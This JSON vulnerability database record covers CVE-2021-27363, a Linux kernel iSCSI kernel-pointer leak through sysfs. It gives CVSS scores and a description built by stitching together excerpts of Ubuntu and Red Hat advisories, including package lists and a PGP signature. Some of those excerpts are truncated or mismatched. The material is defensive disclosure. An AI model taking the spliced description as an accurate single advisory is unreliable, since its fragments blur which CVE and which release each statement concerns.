      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "cvssV2": [
          {
            "acInsufInfo": false,
            "accessComplexity": "LOW",
            "accessVector": "LOCAL",
            "authentication": "NONE",
            "author": "NVD",
            "availabilityImpact": "PARTIAL",
            "baseScore": 3.6,
            "confidentialityImpact": "PARTIAL",
            "exploitabilityScore": 3.9,
            "impactScore": 4.9,
            "integrityImpact": "NONE",
            "obtainAllPrivilege": false,
            "obtainOtherPrivilege": false,
            "obtainUserPrivilege": false,
            "severity": "LOW",
            "trust": 1.0,
            "userInteractionRequired": false,
            "vectorString": "AV:L/AC:L/Au:N/C:P/I:N/A:P",
            "version": "2.0"
          },
          {
            "accessComplexity": "LOW",
            "accessVector": "LOCAL",
            "authentication": "NONE",
            "author": "VULHUB",
            "availabilityImpact": "PARTIAL",
            "baseScore": 3.6,
            "confidentialityImpact": "PARTIAL",
            "exploitabilityScore": 3.9,
            "id": "VHN-386598",
            "impactScore": 4.9,
            "integrityImpact": "NONE",
            "severity": "LOW",
            "trust": 0.1,
            "vectorString": "AV:L/AC:L/AU:N/C:P/I:N/A:P",
            "version": "2.0"
          }
        ],
        "cvssV3": [
          {
            "attackComplexity": "LOW",
            "attackVector": "LOCAL",
            "author": "NVD",
            "availabilityImpact": "LOW",
            "baseScore": 4.4,
            "baseSeverity": "MEDIUM",
            "confidentialityImpact": "LOW",
            "exploitabilityScore": 1.8,
            "impactScore": 2.5,
            "integrityImpact": "NONE",
            "privilegesRequired": "LOW",
            "scope": "UNCHANGED",
            "trust": 1.0,
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:L",
            "version": "3.1"
          }
        ],
        "severity": [
          {
            "author": "NVD",
            "id": "CVE-2021-27363",
            "trust": 1.0,
            "value": "MEDIUM"
          },
          {
            "author": "VULHUB",
            "id": "VHN-386598",
            "trust": 0.1,
            "value": "LOW"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-386598"
      },
      {
        "db": "NVD",
        "id": "CVE-2021-27363"
      }
    ]
  },
  "description": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/description#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "An issue was discovered in the Linux kernel through 5.11.3. A kernel pointer leak can be used to determine the address of the iscsi_transport structure. When an iSCSI transport is registered with the iSCSI subsystem, the transport\u0027s handle is available to unprivileged users via the sysfs file system, at /sys/class/iscsi_transport/$TRANSPORT_NAME/handle. When read, the show_transport_handle function (in drivers/scsi/scsi_transport_iscsi.c) is called, which leaks the handle. This handle is actually the pointer to an iscsi_transport struct in the kernel module\u0027s global variables. 7.4) - noarch, x86_64\n\n3. \n\nBug Fix(es):\n\n* Enable CI and changelog for GitLab workflow (BZ#1930932)\n\n4. =========================================================================\nUbuntu Security Notice USN-4901-1\nApril 06, 2021\n\nlinux-lts-trusty vulnerabilities\n=========================================================================\nA security issue affects these releases of Ubuntu and its derivatives:\n\n- Ubuntu 12.04 ESM\n\nSummary:\n\nSeveral security issues were fixed in the Linux kernel. A local attacker could use this to cause a denial of\nservice (system crash) or possibly execute arbitrary code. (CVE-2021-27365)\n\nIt was discovered that the LIO SCSI target implementation in the Linux\nkernel performed insufficient identifier checking in certain XCOPY\nrequests. An attacker with access to at least one LUN in a multiple\nbackstore environment could use this to expose sensitive information or\nmodify data. (CVE-2020-28374)\n\nAdam Nichols discovered that the iSCSI subsystem in the Linux kernel did\nnot properly restrict access to iSCSI transport handles. A local attacker\ncould use this to cause a denial of service or expose sensitive information\n(kernel pointer addresses). A local attacker could use this to cause a\ndenial of service (system crash) or expose sensitive information (kernel\nmemory). (CVE-2021-27364)\n\nUpdate instructions:\n\nThe problem can be corrected by updating your system to the following\npackage versions:\n\nUbuntu 12.04 ESM:\n  linux-image-3.13.0-185-generic  3.13.0-185.236~12.04.1\n  linux-image-generic-lts-trusty  3.13.0.185.170\n\nAfter a standard system update you need to reboot your computer to make\nall the necessary changes. \n\nATTENTION: Due to an unavoidable ABI change the kernel updates have\nbeen given a new version number, which requires you to recompile and\nreinstall all third party kernel modules you might have installed. \nUnless you manually uninstalled the standard kernel metapackages\n(e.g. linux-generic, linux-generic-lts-RELEASE, linux-virtual,\nlinux-powerpc), a standard system upgrade will automatically perform\nthis as well. Description:\n\nThe kernel-rt packages provide the Real Time Linux Kernel, which enables\nfine-tuning for systems with extremely high determinism requirements. \n\nBug Fix(es):\n\n* kernel-rt possible livelock: WARNING: CPU: 28 PID: 3109 at\nkernel/ptrace.c:242 ptrace_check_attach+0xdd/0x1a0 (BZ#1925308)\n\n* kernel-rt: update RT source tree to the RHEL-8.3.z3 source tree\n(BZ#1926369)\n\n4. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA256\n\n====================================================================                   \nRed Hat Security Advisory\n\nSynopsis:          Important: kernel security and bug fix update\nAdvisory ID:       RHSA-2021:1071-01\nProduct:           Red Hat Enterprise Linux\nAdvisory URL:      https://access.redhat.com/errata/RHSA-2021:1071\nIssue date:        2021-04-06\nCVE Names:         CVE-2021-27363 CVE-2021-27364 CVE-2021-27365\n====================================================================\n1. Summary:\n\nAn update for kernel is now available for Red Hat Enterprise Linux 7. \n\nRed Hat Product Security has rated this update as having a security impact\nof Important. A Common Vulnerability Scoring System (CVSS) base score,\nwhich gives a detailed severity rating, is available for each vulnerability\nfrom the CVE link(s) in the References section. \n\n2. Relevant releases/architectures:\n\nRed Hat Enterprise Linux Client (v. 7) - noarch, x86_64\nRed Hat Enterprise Linux Client Optional (v. 7) - x86_64\nRed Hat Enterprise Linux ComputeNode (v. 7) - noarch, x86_64\nRed Hat Enterprise Linux ComputeNode Optional (v. 7) - x86_64\nRed Hat Enterprise Linux Server (v. 7) - noarch, ppc64, ppc64le, s390x, x86_64\nRed Hat Enterprise Linux Server Optional (v. 7) - ppc64, ppc64le, x86_64\nRed Hat Enterprise Linux Workstation (v. 7) - noarch, x86_64\nRed Hat Enterprise Linux Workstation Optional (v. 7) - x86_64\n\n3. \n\nSecurity Fix(es):\n\n* kernel: out-of-bounds read in libiscsi module (CVE-2021-27364)\n\n* kernel: heap buffer overflow in the iSCSI subsystem (CVE-2021-27365)\n\n* kernel: iscsi: unrestricted access to sessions and handles\n(CVE-2021-27363)\n\nFor more details about the security issue(s), including the impact, a CVSS\nscore, acknowledgments, and other related information, refer to the CVE\npage(s) listed in the References section. \n\nBug Fix(es):\n\n* Customer testing eMMC sees and intermittent boot problem on 7.8+, was not\nseen on 7.3 (BZ#1918916)\n\n* tcm loopback driver causes double-start of scsi command when work is\ndelayed (BZ#1925652)\n\n* [Azure][RHEL-7]Mellanox Patches To Prevent Kernel Hang In MLX4\n(BZ#1925691)\n\n* A patch from upstream c365c292d059 causes us to end up leaving\nrt_nr_boosted in an inconsistent state, which causes a hard lockup. \n(BZ#1928082)\n\n* [RHEL7.9.z] Add fix to update snd_wl1 in bulk receiver fast path\n(BZ#1929804)\n\n4. Solution:\n\nFor details on how to apply this update, which includes the changes\ndescribed in this advisory, refer to:\n\nhttps://access.redhat.com/articles/11258\n\nThe system must be rebooted for this update to take effect. \n\n5. Bugs fixed (https://bugzilla.redhat.com/):\n\n1930078 - CVE-2021-27365 kernel: heap buffer overflow in the iSCSI subsystem\n1930079 - CVE-2021-27363 kernel: iscsi: unrestricted access to sessions and handles\n1930080 - CVE-2021-27364 kernel: out-of-bounds read in libiscsi module\n\n6. Package List:\n\nRed Hat Enterprise Linux Client (v. 7):\n\nSource:\nkernel-3.10.0-1160.24.1.el7.src.rpm\n\nnoarch:\nkernel-abi-whitelists-3.10.0-1160.24.1.el7.noarch.rpm\nkernel-doc-3.10.0-1160.24.1.el7.noarch.rpm\n\nx86_64:\nbpftool-3.10.0-1160.24.1.el7.x86_64.rpm\nbpftool-debuginfo-3.10.0-1160.24.1.el7.x86_64.rpm\nkernel-3.10.0-1160.24.1.el7.x86_64.rpm\nkernel-debug-3.10.0-1160.24.1.el7.x86_64.rpm\nkernel-debug-debuginfo-3.10.0-1160.24.1.el7.x86_64.rpm\nkernel-debug-devel-3.10.0-1160.24.1.el7.x86_64.rpm\nkernel-debuginfo-3.10.0-1160.24.1.el7.x86_64.rpm\nkernel-debuginfo-common-x86_64-3.10.0-1160.24.1.el7.x86_64.rpm\nkernel-devel-3.10.0-1160.24.1.el7.x86_64.rpm\nkernel-headers-3.10.0-1160.24.1.el7.x86_64.rpm\nkernel-tools-3.10.0-1160.24.1.el7.x86_64.rpm\nkernel-tools-debuginfo-3.10.0-1160.24.1.el7.x86_64.rpm\nkernel-tools-libs-3.10.0-1160.24.1.el7.x86_64.rpm\nperf-3.10.0-1160.24.1.el7.x86_64.rpm\nperf-debuginfo-3.10.0-1160.24.1.el7.x86_64.rpm\npython-perf-3.10.0-1160.24.1.el7.x86_64.rpm\npython-perf-debuginfo-3.10.0-1160.24.1.el7.x86_64.rpm\n\nRed Hat Enterprise Linux Client Optional (v. 7):\n\nx86_64:\nbpftool-debuginfo-3.10.0-1160.24.1.el7.x86_64.rpm\nkernel-debug-debuginfo-3.10.0-1160.24.1.el7.x86_64.rpm\nkernel-debuginfo-3.10.0-1160.24.1.el7.x86_64.rpm\nkernel-debuginfo-common-x86_64-3.10.0-1160.24.1.el7.x86_64.rpm\nkernel-tools-debuginfo-3.10.0-1160.24.1.el7.x86_64.rpm\nkernel-tools-libs-devel-3.10.0-1160.24.1.el7.x86_64.rpm\nperf-debuginfo-3.10.0-1160.24.1.el7.x86_64.rpm\npython-perf-debuginfo-3.10.0-1160.24.1.el7.x86_64.rpm\n\nRed Hat Enterprise Linux ComputeNode (v. 7):\n\nSource:\nkernel-3.10.0-1160.24.1.el7.src.rpm\n\nnoarch:\nkernel-abi-whitelists-3.10.0-1160.24.1.el7.noarch.rpm\nkernel-doc-3.10.0-1160.24.1.el7.noarch.rpm\n\nx86_64:\nbpftool-3.10.0-1160.24.1.el7.x86_64.rpm\nbpftool-debuginfo-3.10.0-1160.24.1.el7.x86_64.rpm\nkernel-3.10.0-1160.24.1.el7.x86_64.rpm\nkernel-debug-3.10.0-1160.24.1.el7.x86_64.rpm\nkernel-debug-debuginfo-3.10.0-1160.24.1.el7.x86_64.rpm\nkernel-debug-devel-3.10.0-1160.24.1.el7.x86_64.rpm\nkernel-debuginfo-3.10.0-1160.24.1.el7.x86_64.rpm\nkernel-debuginfo-common-x86_64-3.10.0-1160.24.1.el7.x86_64.rpm\nkernel-devel-3.10.0-1160.24.1.el7.x86_64.rpm\nkernel-headers-3.10.0-1160.24.1.el7.x86_64.rpm\nkernel-tools-3.10.0-1160.24.1.el7.x86_64.rpm\nkernel-tools-debuginfo-3.10.0-1160.24.1.el7.x86_64.rpm\nkernel-tools-libs-3.10.0-1160.24.1.el7.x86_64.rpm\nperf-3.10.0-1160.24.1.el7.x86_64.rpm\nperf-debuginfo-3.10.0-1160.24.1.el7.x86_64.rpm\npython-perf-3.10.0-1160.24.1.el7.x86_64.rpm\npython-perf-debuginfo-3.10.0-1160.24.1.el7.x86_64.rpm\n\nRed Hat Enterprise Linux ComputeNode Optional (v. 7):\n\nx86_64:\nbpftool-debuginfo-3.10.0-1160.24.1.el7.x86_64.rpm\nkernel-debug-debuginfo-3.10.0-1160.24.1.el7.x86_64.rpm\nkernel-debuginfo-3.10.0-1160.24.1.el7.x86_64.rpm\nkernel-debuginfo-common-x86_64-3.10.0-1160.24.1.el7.x86_64.rpm\nkernel-tools-debuginfo-3.10.0-1160.24.1.el7.x86_64.rpm\nkernel-tools-libs-devel-3.10.0-1160.24.1.el7.x86_64.rpm\nperf-debuginfo-3.10.0-1160.24.1.el7.x86_64.rpm\npython-perf-debuginfo-3.10.0-1160.24.1.el7.x86_64.rpm\n\nRed Hat Enterprise Linux Server (v. 7):\n\nSource:\nkernel-3.10.0-1160.24.1.el7.src.rpm\n\nnoarch:\nkernel-abi-whitelists-3.10.0-1160.24.1.el7.noarch.rpm\nkernel-doc-3.10.0-1160.24.1.el7.noarch.rpm\n\nppc64:\nbpftool-3.10.0-1160.24.1.el7.ppc64.rpm\nbpftool-debuginfo-3.10.0-1160.24.1.el7.ppc64.rpm\nkernel-3.10.0-1160.24.1.el7.ppc64.rpm\nkernel-bootwrapper-3.10.0-1160.24.1.el7.ppc64.rpm\nkernel-debug-3.10.0-1160.24.1.el7.ppc64.rpm\nkernel-debug-debuginfo-3.10.0-1160.24.1.el7.ppc64.rpm\nkernel-debug-devel-3.10.0-1160.24.1.el7.ppc64.rpm\nkernel-debuginfo-3.10.0-1160.24.1.el7.ppc64.rpm\nkernel-debuginfo-common-ppc64-3.10.0-1160.24.1.el7.ppc64.rpm\nkernel-devel-3.10.0-1160.24.1.el7.ppc64.rpm\nkernel-headers-3.10.0-1160.24.1.el7.ppc64.rpm\nkernel-tools-3.10.0-1160.24.1.el7.ppc64.rpm\nkernel-tools-debuginfo-3.10.0-1160.24.1.el7.ppc64.rpm\nkernel-tools-libs-3.10.0-1160.24.1.el7.ppc64.rpm\nperf-3.10.0-1160.24.1.el7.ppc64.rpm\nperf-debuginfo-3.10.0-1160.24.1.el7.ppc64.rpm\npython-perf-3.10.0-1160.24.1.el7.ppc64.rpm\npython-perf-debuginfo-3.10.0-1160.24.1.el7.ppc64.rpm\n\nppc64le:\nbpftool-3.10.0-1160.24.1.el7.ppc64le.rpm\nbpftool-debuginfo-3.10.0-1160.24.1.el7.ppc64le.rpm\nkernel-3.10.0-1160.24.1.el7.ppc64le.rpm\nkernel-bootwrapper-3.10.0-1160.24.1.el7.ppc64le.rpm\nkernel-debug-3.10.0-1160.24.1.el7.ppc64le.rpm\nkernel-debug-debuginfo-3.10.0-1160.24.1.el7.ppc64le.rpm\nkernel-debuginfo-3.10.0-1160.24.1.el7.ppc64le.rpm\nkernel-debuginfo-common-ppc64le-3.10.0-1160.24.1.el7.ppc64le.rpm\nkernel-devel-3.10.0-1160.24.1.el7.ppc64le.rpm\nkernel-headers-3.10.0-1160.24.1.el7.ppc64le.rpm\nkernel-tools-3.10.0-1160.24.1.el7.ppc64le.rpm\nkernel-tools-debuginfo-3.10.0-1160.24.1.el7.ppc64le.rpm\nkernel-tools-libs-3.10.0-1160.24.1.el7.ppc64le.rpm\nperf-3.10.0-1160.24.1.el7.ppc64le.rpm\nperf-debuginfo-3.10.0-1160.24.1.el7.ppc64le.rpm\npython-perf-3.10.0-1160.24.1.el7.ppc64le.rpm\npython-perf-debuginfo-3.10.0-1160.24.1.el7.ppc64le.rpm\n\ns390x:\nbpftool-3.10.0-1160.24.1.el7.s390x.rpm\nbpftool-debuginfo-3.10.0-1160.24.1.el7.s390x.rpm\nkernel-3.10.0-1160.24.1.el7.s390x.rpm\nkernel-debug-3.10.0-1160.24.1.el7.s390x.rpm\nkernel-debug-debuginfo-3.10.0-1160.24.1.el7.s390x.rpm\nkernel-debug-devel-3.10.0-1160.24.1.el7.s390x.rpm\nkernel-debuginfo-3.10.0-1160.24.1.el7.s390x.rpm\nkernel-debuginfo-common-s390x-3.10.0-1160.24.1.el7.s390x.rpm\nkernel-devel-3.10.0-1160.24.1.el7.s390x.rpm\nkernel-headers-3.10.0-1160.24.1.el7.s390x.rpm\nkernel-kdump-3.10.0-1160.24.1.el7.s390x.rpm\nkernel-kdump-debuginfo-3.10.0-1160.24.1.el7.s390x.rpm\nkernel-kdump-devel-3.10.0-1160.24.1.el7.s390x.rpm\nperf-3.10.0-1160.24.1.el7.s390x.rpm\nperf-debuginfo-3.10.0-1160.24.1.el7.s390x.rpm\npython-perf-3.10.0-1160.24.1.el7.s390x.rpm\npython-perf-debuginfo-3.10.0-1160.24.1.el7.s390x.rpm\n\nx86_64:\nbpftool-3.10.0-1160.24.1.el7.x86_64.rpm\nbpftool-debuginfo-3.10.0-1160.24.1.el7.x86_64.rpm\nkernel-3.10.0-1160.24.1.el7.x86_64.rpm\nkernel-debug-3.10.0-1160.24.1.el7.x86_64.rpm\nkernel-debug-debuginfo-3.10.0-1160.24.1.el7.x86_64.rpm\nkernel-debug-devel-3.10.0-1160.24.1.el7.x86_64.rpm\nkernel-debuginfo-3.10.0-1160.24.1.el7.x86_64.rpm\nkernel-debuginfo-common-x86_64-3.10.0-1160.24.1.el7.x86_64.rpm\nkernel-devel-3.10.0-1160.24.1.el7.x86_64.rpm\nkernel-headers-3.10.0-1160.24.1.el7.x86_64.rpm\nkernel-tools-3.10.0-1160.24.1.el7.x86_64.rpm\nkernel-tools-debuginfo-3.10.0-1160.24.1.el7.x86_64.rpm\nkernel-tools-libs-3.10.0-1160.24.1.el7.x86_64.rpm\nperf-3.10.0-1160.24.1.el7.x86_64.rpm\nperf-debuginfo-3.10.0-1160.24.1.el7.x86_64.rpm\npython-perf-3.10.0-1160.24.1.el7.x86_64.rpm\npython-perf-debuginfo-3.10.0-1160.24.1.el7.x86_64.rpm\n\nRed Hat Enterprise Linux Server Optional (v. 7):\n\nppc64:\nbpftool-debuginfo-3.10.0-1160.24.1.el7.ppc64.rpm\nkernel-debug-debuginfo-3.10.0-1160.24.1.el7.ppc64.rpm\nkernel-debuginfo-3.10.0-1160.24.1.el7.ppc64.rpm\nkernel-debuginfo-common-ppc64-3.10.0-1160.24.1.el7.ppc64.rpm\nkernel-tools-debuginfo-3.10.0-1160.24.1.el7.ppc64.rpm\nkernel-tools-libs-devel-3.10.0-1160.24.1.el7.ppc64.rpm\nperf-debuginfo-3.10.0-1160.24.1.el7.ppc64.rpm\npython-perf-debuginfo-3.10.0-1160.24.1.el7.ppc64.rpm\n\nppc64le:\nbpftool-debuginfo-3.10.0-1160.24.1.el7.ppc64le.rpm\nkernel-debug-debuginfo-3.10.0-1160.24.1.el7.ppc64le.rpm\nkernel-debug-devel-3.10.0-1160.24.1.el7.ppc64le.rpm\nkernel-debuginfo-3.10.0-1160.24.1.el7.ppc64le.rpm\nkernel-debuginfo-common-ppc64le-3.10.0-1160.24.1.el7.ppc64le.rpm\nkernel-tools-debuginfo-3.10.0-1160.24.1.el7.ppc64le.rpm\nkernel-tools-libs-devel-3.10.0-1160.24.1.el7.ppc64le.rpm\nperf-debuginfo-3.10.0-1160.24.1.el7.ppc64le.rpm\npython-perf-debuginfo-3.10.0-1160.24.1.el7.ppc64le.rpm\n\nx86_64:\nbpftool-debuginfo-3.10.0-1160.24.1.el7.x86_64.rpm\nkernel-debug-debuginfo-3.10.0-1160.24.1.el7.x86_64.rpm\nkernel-debuginfo-3.10.0-1160.24.1.el7.x86_64.rpm\nkernel-debuginfo-common-x86_64-3.10.0-1160.24.1.el7.x86_64.rpm\nkernel-tools-debuginfo-3.10.0-1160.24.1.el7.x86_64.rpm\nkernel-tools-libs-devel-3.10.0-1160.24.1.el7.x86_64.rpm\nperf-debuginfo-3.10.0-1160.24.1.el7.x86_64.rpm\npython-perf-debuginfo-3.10.0-1160.24.1.el7.x86_64.rpm\n\nRed Hat Enterprise Linux Workstation (v. 7):\n\nSource:\nkernel-3.10.0-1160.24.1.el7.src.rpm\n\nnoarch:\nkernel-abi-whitelists-3.10.0-1160.24.1.el7.noarch.rpm\nkernel-doc-3.10.0-1160.24.1.el7.noarch.rpm\n\nx86_64:\nbpftool-3.10.0-1160.24.1.el7.x86_64.rpm\nbpftool-debuginfo-3.10.0-1160.24.1.el7.x86_64.rpm\nkernel-3.10.0-1160.24.1.el7.x86_64.rpm\nkernel-debug-3.10.0-1160.24.1.el7.x86_64.rpm\nkernel-debug-debuginfo-3.10.0-1160.24.1.el7.x86_64.rpm\nkernel-debug-devel-3.10.0-1160.24.1.el7.x86_64.rpm\nkernel-debuginfo-3.10.0-1160.24.1.el7.x86_64.rpm\nkernel-debuginfo-common-x86_64-3.10.0-1160.24.1.el7.x86_64.rpm\nkernel-devel-3.10.0-1160.24.1.el7.x86_64.rpm\nkernel-headers-3.10.0-1160.24.1.el7.x86_64.rpm\nkernel-tools-3.10.0-1160.24.1.el7.x86_64.rpm\nkernel-tools-debuginfo-3.10.0-1160.24.1.el7.x86_64.rpm\nkernel-tools-libs-3.10.0-1160.24.1.el7.x86_64.rpm\nperf-3.10.0-1160.24.1.el7.x86_64.rpm\nperf-debuginfo-3.10.0-1160.24.1.el7.x86_64.rpm\npython-perf-3.10.0-1160.24.1.el7.x86_64.rpm\npython-perf-debuginfo-3.10.0-1160.24.1.el7.x86_64.rpm\n\nRed Hat Enterprise Linux Workstation Optional (v. 7):\n\nx86_64:\nbpftool-debuginfo-3.10.0-1160.24.1.el7.x86_64.rpm\nkernel-debug-debuginfo-3.10.0-1160.24.1.el7.x86_64.rpm\nkernel-debuginfo-3.10.0-1160.24.1.el7.x86_64.rpm\nkernel-debuginfo-common-x86_64-3.10.0-1160.24.1.el7.x86_64.rpm\nkernel-tools-debuginfo-3.10.0-1160.24.1.el7.x86_64.rpm\nkernel-tools-libs-devel-3.10.0-1160.24.1.el7.x86_64.rpm\nperf-debuginfo-3.10.0-1160.24.1.el7.x86_64.rpm\npython-perf-debuginfo-3.10.0-1160.24.1.el7.x86_64.rpm\n\nThese packages are GPG signed by Red Hat for security.  Our key and\ndetails on how to verify the signature are available from\nhttps://access.redhat.com/security/team/key/\n\n7. References:\n\nhttps://access.redhat.com/security/cve/CVE-2021-27363\nhttps://access.redhat.com/security/cve/CVE-2021-27364\nhttps://access.redhat.com/security/cve/CVE-2021-27365\nhttps://access.redhat.com/security/updates/classification/#important\n\n8. Contact:\n\nThe Red Hat security contact is \u003csecalert@redhat.com\u003e. More contact\ndetails at https://access.redhat.com/security/team/contact/\n\nCopyright 2021 Red Hat, Inc. \n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1\n\niQIVAwUBYGwp7tzjgjWX9erEAQgQXQ//b1YLCLj3RXDop9pRP30zQj7xj3xDYBK5\n7FLTR7K6HVYynrzKBJ87TyJkuhaPpTi8452HYHjLaYt6VYa+j1Jr+PVQr+ZaO+Rz\niSRl3Sr5NYynAt9g2vNp6tfeeYPddVSpDpxkUr84EDRZ9Jg8tYtLkanRT9cH02gs\n+TYPCUZn/2Ii6YQjksIZmv6VVUZepMaO/kDDEi89ivGCffaMvS70Z86498XawgeM\neJttBvztEv5K6wvaRtnJegmeonYKxouP1FYDyXh+WAG6zjQDcUEWUKgwdGGn+mXb\nk4T6F/ktCAx7wSKgt4kMvVmvzOc5jScJ2V0aK3rvm5LnqHoNin5syGOIHm6BM5Jp\nKTO6MGa9ex7xQdz/pNU/4aqxtKK0G4ceL8xjEGpei5U0gIEXuK4KFySa1bDQa2Xd\neN2VtwzajY2tvCe7FrKuwKGb6HyIQK39C8hUHsD2x+JwLCxb12DWBY0ulJzh2C2l\nLPwWFWMhJqH2GG2wIKh6msCQOMJOGO3zwLtkGMj5dXrmDBHhkkT1FZnL0DdDxL3m\nJGija+Tr50EFGBFZvS1brChBEqwHqklkUQ3nWVXDj8ipRXJMOOGHbssw9FqnX01B\nqF414rmDTU1tBHc7bPo8/q5zMXKV5vOixRplzs0sw0hlBJKjvlpVpDMiseo3crlj\nghAOW9EzFXk=pxZs\n-----END PGP SIGNATURE-----\n\n--\nRHSA-announce mailing list\nRHSA-announce@redhat.com\nhttps://listman.redhat.com/mailman/listinfo/rhsa-announce\n. 7.7) - ppc64, ppc64le, x86_64\n\n3. \n\nBug Fix(es):\n\n* memcg: mem_cgroup_idr can be updated in an uncoordinated manner which can\nlead to corruption (BZ#1931899)\n\n* [infiniband] Backport Request to fix Multicast Sendonly joins\n(BZ#1937819)\n\n* [Azure][RHEL-7]Mellanox Patches To Prevent Kernel Hang In MLX4\n(BZ#1939791)\n\n4. 8) - aarch64, noarch, ppc64le, s390x, x86_64\n\n3. \n\nBug Fix(es):\n\n* race condition when creating child sockets from syncookies (BZ#1915529)\n\n* On System Z, a hash needs state randomized for entropy extraction\n(BZ#1915816)\n\n* scsi: target: core_tmr_abort_task() reporting multiple aborts for the\nsame se_cmd-\u003etag (BZ#1918354)\n\n* [mlx5] VF interface stats are not reflected in \"ip -s link show\" /\n\"ifconfig \u003cvf\u003e\" commands (BZ#1921060)\n\n* Win10 guest automatic reboot after migration in Win10 and WSL2 on Intel\nhosts (BZ#1923281)\n\n* [RHEL 8.3] Repeated messages - Unable to burst-read optrom segment\n(BZ#1924222)\n\n* Backport bug fix RDMA/umem: Prevent small pages from being returned by\nib_umem_find_best_pgsz (BZ#1924691)\n\n* [Cisco 8.3] RHEL/Cent 8.2 fNIC driver needs a patch fix that addresses\ncrash (BZ#1925186)\n\n* RHEL8.3 - The kernel misdetects zCX with z/VM (BZ#1925508)\n\n* Backport 22e4663e91 (\"mm/slub: fix panic in slab_alloc_node()\")\n(BZ#1925511)\n\n* SCTP \"Address already in use\" when no active endpoints from RHEL 8.2\nonwards (BZ#1927521)\n\n* lpfc: Fix initial FLOGI failure due to BBSCN not supported  (BZ#1927921)\n\n* [mm] mm, oom: remove oom_lock from oom_reaper (BZ#1929738)\n\n* Unexpected thread movement with AMD Milan compared to Rome (BZ#1929740)\n\n* rpmbuild cannot build the userspace RPMs in the kernel package when the\nkernel itself is not built (BZ#1929910)\n\n* [Regression] RHEL8.2 - ISST-LTE:pVM:diapvmlp83:sum:memory DLPAR fails to\nadd memory on multiple trials[mm/memory_hotplug.c:1163] (mm-) (BZ#1930168)\n\n* Configuring the system with non-RT kernel will hang the system\n(BZ#1930735)\n\n* Upstream Patch for Gracefully handle DMAR units with no supported address\nwidthsx86/vt-d (BZ#1932199)\n\n* gfs2: Deadlock between gfs2_{create_inode,inode_lookup} and\ndelete_work_func (BZ#1937109)\n\n* Failing on tsx-ctrl when the flag doesn\u0027t change anything (BZ#1939013)\n\nEnhancement(s):\n\n* RFE: Backport all Audit enhancements and fixes up to version 5.10-rc1\n(BZ#1907520)\n\n* RHEL8.4: Update the target driver (BZ#1918363)\n\n* [Mellanox 8.4 FEAT] mlx5: Hairpin Support in Switch Mode (BZ#1924689)\n\n4",
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2021-27363"
      },
      {
        "db": "VULHUB",
        "id": "VHN-386598"
      },
      {
        "db": "PACKETSTORM",
        "id": "162242"
      },
      {
        "db": "PACKETSTORM",
        "id": "162341"
      },
      {
        "db": "PACKETSTORM",
        "id": "162115"
      },
      {
        "db": "PACKETSTORM",
        "id": "162108"
      },
      {
        "db": "PACKETSTORM",
        "id": "162098"
      },
      {
        "db": "PACKETSTORM",
        "id": "162528"
      },
      {
        "db": "PACKETSTORM",
        "id": "162112"
      }
    ],
    "trust": 1.62
  },
  "external_ids": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "db": "NVD",
        "id": "CVE-2021-27363",
        "trust": 1.8
      },
      {
        "db": "PACKETSTORM",
        "id": "162117",
        "trust": 1.1
      },
      {
        "db": "OPENWALL",
        "id": "OSS-SECURITY/2021/03/06/1",
        "trust": 1.1
      },
      {
        "db": "PACKETSTORM",
        "id": "162115",
        "trust": 0.2
      },
      {
        "db": "PACKETSTORM",
        "id": "162341",
        "trust": 0.2
      },
      {
        "db": "PACKETSTORM",
        "id": "162528",
        "trust": 0.2
      },
      {
        "db": "PACKETSTORM",
        "id": "162098",
        "trust": 0.2
      },
      {
        "db": "PACKETSTORM",
        "id": "162108",
        "trust": 0.2
      },
      {
        "db": "PACKETSTORM",
        "id": "162242",
        "trust": 0.2
      },
      {
        "db": "PACKETSTORM",
        "id": "162112",
        "trust": 0.2
      },
      {
        "db": "PACKETSTORM",
        "id": "161952",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "162478",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "162095",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "162246",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "162156",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "162151",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "161973",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "162247",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "161909",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "162255",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "162346",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "162383",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "162337",
        "trust": 0.1
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202103-523",
        "trust": 0.1
      },
      {
        "db": "VULHUB",
        "id": "VHN-386598",
        "trust": 0.1
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-386598"
      },
      {
        "db": "PACKETSTORM",
        "id": "162242"
      },
      {
        "db": "PACKETSTORM",
        "id": "162341"
      },
      {
        "db": "PACKETSTORM",
        "id": "162115"
      },
      {
        "db": "PACKETSTORM",
        "id": "162108"
      },
      {
        "db": "PACKETSTORM",
        "id": "162098"
      },
      {
        "db": "PACKETSTORM",
        "id": "162528"
      },
      {
        "db": "PACKETSTORM",
        "id": "162112"
      },
      {
        "db": "NVD",
        "id": "CVE-2021-27363"
      }
    ]
  },
  "id": "VAR-202103-0920",
  "iot": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/iot#",
      "sources": {
        "@container": "@list",
